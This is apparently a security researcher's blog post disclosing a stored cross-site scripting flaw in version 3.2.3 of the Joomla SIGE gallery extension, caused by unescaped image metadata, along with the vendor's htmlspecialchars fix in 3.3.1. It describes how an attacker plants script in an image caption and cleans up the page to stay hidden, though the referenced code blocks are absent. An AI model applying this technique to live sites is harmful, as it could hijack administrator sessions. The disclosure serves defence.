Joomla SIGE is a popular extension for creating image galleries within the Joomla CMS. An injection vulnerability was discovered that enables execution of a Cross Site Scripting (XSS) attack. The extension does not sanitize the text that it retrieves from the image header. Once published online the the image will cause the browser to load malicious content.
The version I tested against is 3.2.3 from the Joomla extensions page .
In the htmlImageAddTitleAttribute function, the title of the image is incorporated into the the HTML:
On line 1669 of sige.php:
The variable image_description is not escaped properly and allows any character to be sent to the user. The value of this variable is obtained via the getimagesize function in iptcInfo function on line 1515:
The the source of the data of the image description is not escaped and allows the HTML special characters to make their way to the user’s browser.
In order to take advantage of this vulnerability the attacker needs to prepare an image with malicious content:
Next, the attacker will need to place the image into the gallery. There are multiple scenarios for how this could happen:
- A gallery may allow the public or low-privileged members to upload images.
- An attacker may already have another vulnerability which allows them to place an image into the gallery directory.
- The gallery administrator might inadvertently download a malicious image from somewhere on the internet and expose everyone who views the gallery.
Once the image description is displayed to the user, the attacker can launch attacks against the browser or anything else within the context of the user – which could be the Joomla administrator.
The problem is that injecting this HTML messes up the DOM of the page, making the exploit not very stealthy. And so, the first thing that the xss.js will do is clean up. Note that the clean up code has to protect from cleaning up twice because the EXIF caption is inserted twice by the SIGE plugin.
To fix the vulnerability, the image description field needs to be sanitised in the htmlImageAddTitleAttribute function, before it reaches the HTML content. PHP provides the htmlspecialchars function to do this. Thanks to Viktor Vogel of Kubik-Rubik for fixing and releasing an update very quickly !
In my tests I was able to confirm that version 3.3.1 is not vulnerable to this exploit. The above code on line 1321 maps over all the data retrieved from the image and applied the htmlspecialchars function. This ensures that everything from the EXIF header is properly escaped before it is presented to the user.
3 – brominer.com
Synack provides initiatives to help foster the researcher community and engage top talent; technology to optimize researcher efficiency and accelerate vulnerability discovery, opportunities to work on unique targets, personalized support, and skills development. We do this through the Synack platform and our SRT Levels program which includes fun competitions, gamification, mentorship, and specialized projects.
Apply to join the Synack Red Team and become one of the chosen few. We provide the best support for our researchers, and put the highest quality, most relevant features into our platform – it was designed by hackers for hackers.
If you’re up for the challenge, apply today, and use code “SRTBLOGS” in your application.